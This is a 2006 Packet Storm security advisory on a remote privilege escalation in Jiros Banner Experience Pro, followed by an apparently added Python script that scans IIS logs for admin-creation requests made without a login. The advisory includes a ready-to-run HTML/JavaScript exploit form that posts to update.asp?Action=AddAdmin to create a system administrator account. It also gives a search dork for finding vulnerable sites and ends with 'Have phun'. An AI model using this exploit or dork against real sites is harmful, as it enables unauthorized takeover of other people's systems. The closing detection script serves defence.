Jiros.txt

2006-03-10T00:00:00
ID PACKETSTORM:44533
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-03-10T00:00:00

Description

                                        
                                            `--Security Report--  
Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 07/03/06 04:52 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: Jiros (http://www.jiros.net)  
Version: 1.0 and prior versions must be affected.  
About: Via this method a remote attacker can bypass the system's security
control and edit all options.
Level: Critical  
---  
How&Example:
The security control in the admin panel's index is not sanitized properly.
GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/
With this example a remote attacker bypasses the security control, but s/he
will get some errors because s/he is not logged in to the system and does not
have admin cookies, so let's add a new admin account :)
GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp
With this example a remote attacker can create an admin account successfully,
and after logging in via http://[victim]/[JBPSDir]/files/login.asp can take
control of the whole system.
---  
Timeline:  
* 07/03/2006: Vulnerability found.  
* 07/03/2006: Contacted vendor, waiting for reply.
---  
Exploit:  
http://www.nukedx.com/?getxpl=19  
With this exploit remote attacker can make new admin account.  
  
<html>  
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>  
<body bgcolor="#000000">  
<style>  
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}  
</style>  
<script language="JavaScript">  
function jbxpl() {  
if (document.xplt.victim.value=="") {  
alert("Please enter site!");  
return false;  
}  
if (confirm("Are you sure?")) {  
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";  
xplt.aName.value=document.xplt.aName.value;  
xplt.aEmail.value=document.xplt.aEmail.value;  
xplt.aPassword.value=document.xplt.aPassword.value;  
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;  
xplt.aIsActive=document.xplt.aIsActive.value;  
xplt.submit();  
}  
}  
</script>  
<strong>  
<font class="xpl" color="#00FF40">  
<pre>  
<center>  
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit  
This exploit has been coded by nukedx  
You can found original advisory on http://www.nukedx.com/?viewdoc=19  
Dork for this exploit: <u>inurl:JBSPro</u>  
Your target must be like that: www.victim.com/Path/  
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp  
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/  
For second example your target must be www.victim.com/  
You can login with your admin account via www.victim.com/JBSPath/files/login.asp  
Have phun  
<form name="xplt" method="POST" onsubmit="jbxpl();">  
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">  
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">  
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">  
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">  
<input type="hidden" name="aIsSystemAdmin" value="True">  
<input type="hidden" name="aIsActive" value="True">  
<input type="submit" value="Send" class="xpl">  
</form>  
</pre>  
</font>  
</strong>  
</body>  
</html>  
  
Save this code as .htm and then execute.  
  
# nukedx.com [2006-03-07]  
  
  
  
---  
Dorks:  
inurl:JBSPro  
---  
Original advisory: http://www.nukedx.com/?viewdoc=19  
  
`
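For responders checking whether the admin-creation pages named in the advisory above were reached without a login, the following is an added detection example, not part of the original advisory or the vendor's code. It assumes IIS W3C logs with cs(Cookie) logging enabled, that a legitimate admin session starts with a POST to files/login.asp carrying the same cookie, and uses a constructed sample log.

```python
"""Flag admin-creation requests in IIS W3C logs that no login POST preceded."""
from urllib.parse import parse_qs

# Constructed sample log (not real traffic); the field layout is an assumption.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
2006-03-08 10:01:12 192.0.2.10 GET /JBSPro/files/login.asp - 200 -
2006-03-08 10:01:30 192.0.2.10 POST /JBSPro/files/login.asp - 302 ASPSESSIONIDAAAA=BBBB
2006-03-08 10:02:05 192.0.2.10 POST /JBSPro/files/update.asp Action=AddAdmin 302 ASPSESSIONIDAAAA=BBBB
2006-03-08 11:15:40 198.51.100.7 GET /JBSPro/files/addadmin.asp - 200 -
2006-03-08 11:15:52 198.51.100.7 POST /JBSPro/files/update.asp Action=AddAdmin 302 -
2006-03-08 11:20:03 203.0.113.9 POST /JBSPro/files/update.asp Action=AddAdmin 404 -
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def is_admin_add(row):
    """True for the two admin-creation URLs named in the advisory."""
    stem = row["cs-uri-stem"].lower()
    if stem.endswith("/files/addadmin.asp"):
        return True
    query = parse_qs(row["cs-uri-query"].lower())
    return stem.endswith("/files/update.asp") and "addadmin" in query.get("action", [])

def find_unauthenticated_admin_adds(text):
    """Return admin-creation requests whose cookie never appeared on a login POST."""
    logged_in, hits = set(), []
    for row in parse_w3c(text):
        cookie, stem = row["cs(Cookie)"], row["cs-uri-stem"].lower()
        if row["cs-method"] == "POST" and stem.endswith("/files/login.asp") and cookie != "-":
            logged_in.add(cookie)  # heuristic: any login POST counts as a session start
        elif is_admin_add(row) and int(row["sc-status"]) < 400 and cookie not in logged_in:
            hits.append((row["date"], row["time"], row["c-ip"], row["cs-method"], row["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for hit in find_unauthenticated_admin_adds(SAMPLE_LOG):
        print(*hit)
```

Any hit should be followed by a review of the application's admin account list for entries created around the logged time.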